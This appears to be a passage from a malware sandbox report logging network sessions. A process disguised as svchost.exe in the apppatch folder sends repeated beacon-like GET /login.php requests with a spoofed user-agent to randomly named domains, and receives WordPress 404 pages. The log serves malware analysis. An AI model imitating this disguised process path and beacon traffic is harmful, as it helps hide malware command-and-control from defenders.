74 74 6f 6e 20 2e Data Ascii: 7ca4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 Data Ascii: </style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e Data Ascii: nction c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.can
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f Data Ascii: ined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSO
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 Data Ascii: ).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minifi
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f Data Ascii: site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;fo
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d Data Ascii: ]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 Data Ascii: ontent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .ent
2024-11-11 17:13:04 UTC	1369	IN	Data Raw: 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 Data Ascii: sible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	58879	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:06 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-11-11 17:13:08 UTC	1088	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="57.6",amp_style_sanitizer;dur="24.5",amp_tag_and_attribute_sanitizer;dur="26.8",amp_optimizer;dur="24.6" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucylzZkDHjuy5%2FhNaZ6Y2Glc6ThAgjJBg0bsoarZbtCCcEKPa1vPwTSYd3kUNHfaXP7Xz3Ra8EZ8WK%2BC3tVRPcDMHsUI3Wti%2FbZM38KY%2B6haEAMaCIIaujl3GOIBgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9374e20eb7f-SEA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=60390&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=47939&cwnd=32&unsent_bytes=0&cid=cd3b4c6f53ab7a2b&ts=1740&x=0"
2024-11-11 17:13:08 UTC	281	IN	Data Raw: 37 63 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c1c<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-11-11 17:13:08 UTC	1369	IN	Data Raw: 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 Data Ascii: et="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100
2024-11-11 17:13:08 UTC	1369	IN	Data Raw: 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 Data Ascii: ng:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{vi
2024-11-11 17:13:08 UTC	1369	IN	Data Raw: 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 Data Ascii: 0%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-typ
2024-11-11 17:13:08 UTC	1369	IN	Data Raw: 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 Data Ascii: ml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;posit
2024-11-11 17:13:08 UTC	1369	IN	Data Raw: 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b Data Ascii: :none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;
2024-11-11 17:13:08 UTC	1369	IN	Data Raw: 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d Data Ascii: ot(.i-amphtml-layout-container)>,[layout]:not([layout=container]):not(.i-amphtml-element)>,[width][height][heights]:not([layout]):not(.i-amphtml-element)>,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>{display:none}amp-img:not(.i-amphtm
2024-11-11 17:13:08 UTC	1369	IN	Data Raw: 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f Data Ascii: :0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!impo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	58899	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:08 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-11-11 17:13:11 UTC	1099	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="163.0",amp_style_sanitizer;dur="96.1",amp_tag_and_attribute_sanitizer;dur="52.7",amp_optimizer;dur="50.0" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjYob1fC0Ti83h2e1HNsSkdt0G%2FzptS9nuUYCs1%2FlUO%2F%2B0o6FuYZI9ql28qeoFMtzHvPGk7%2F9H0oYcXSMLlSwdWnXT0EC%2F0%2FD9uhxEJeX1cywuudg%2FlrCKFeT5yMDg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe94729590f42-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1329&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=2234567&cwnd=251&unsent_bytes=0&cid=5cece37b9fce5940&ts=2681&x=0"
2024-11-11 17:13:11 UTC	270	IN	Data Raw: 37 63 31 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c13<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" 